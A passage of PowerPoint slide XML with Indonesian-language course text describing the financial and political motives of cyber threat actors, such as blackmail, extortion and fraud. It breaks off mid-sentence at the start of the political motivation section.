              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjualnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain. Atau, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengancam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> korban </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penipuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menuntut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembayaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelepasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seolah-olah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kejahatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menuntut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembayaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghentikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembayaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membukanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penipuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memalsukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penipuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggelapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> detail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencuci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> uang. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penjahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penipuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memposting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saham</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempromosikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>piramida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Politik</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>politik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membawa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masyarakat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelapor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
